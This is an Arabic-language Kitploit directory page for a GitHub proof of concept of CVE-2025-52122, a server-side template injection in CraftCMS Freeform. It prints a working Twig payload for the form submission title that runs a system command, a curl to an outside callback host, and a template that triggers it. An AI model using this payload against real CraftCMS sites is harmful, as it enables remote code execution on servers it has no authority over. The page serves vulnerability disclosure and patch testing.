Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-52122 — حقن كود تعسفي في CraftCMS Freeform 5.0.0 < 5.10.16 | Kitploit
أدوات/GitHubGitHub/timtrademark/cve-2025-52122
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubtimtrademark/cve-2025-52122

CVE-2025-52122

حقن كود تعسفي في CraftCMS Freeform 5.0.0 < 5.10.16

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE CraftCMS Freeform

CraftCMS Freeform يحتوي على ثغرة SSTI تؤدي إلى حقن تعليمات برمجية عشوائية لجميع المستخدمين الذين لديهم صلاحية تحرير نموذج (عنوان الإرسال).

الإصدارات المتأثرة هي v5.0.0 < v5.10.16.

خطوات إعادة الإنتاج

أنشئ نموذجًا:

create a form

لقد أنشأت النموذج "pentest" هنا كإثبات للمفهوم. بعد ذلك، ضمن الإعدادات، عيّن عنوان الإرسال التالي (غيّر اسم النطاق إلى خادمك الخاص):

root@kitploit:~
{{ 'system' | call('curl http://gwgyynafr4feu5xecukf1h2nqew5kw8l.oastify.com/rce') }}

submission title

سيؤدي هذا إلى تنفيذ استدعاء نظام عشوائي. في هذه الحالة، أقوم بتنفيذ طلب curl إلى خادم تحت سيطرتي ليخبرني في حال وجود اتصالات واردة. بعد ذلك، أدرج هذا النموذج في قالب/صفحة وأرسله:

root@kitploit:~
<h1>test</h1>
{% set form = freeform.form('pentest') %}

{% if form %}
  {{ form.render() }}
{% else %}
  <p>Form not found.</p>
{% endif %}

سيكون قد تم استدعاء أمر curl. يمكننا التحقق من ذلك بالنظر إلى طلب HTTP الوارد الذي تم إنشاؤه:

incoming connection

السبب الجذري لهذه المشكلة هو أن Freeform يطبّق مُرشِّح Twig "call" دون التحقق من مدخلات المستخدم. تم إصلاح ذلك في commit التالي.

تنزيل الأداة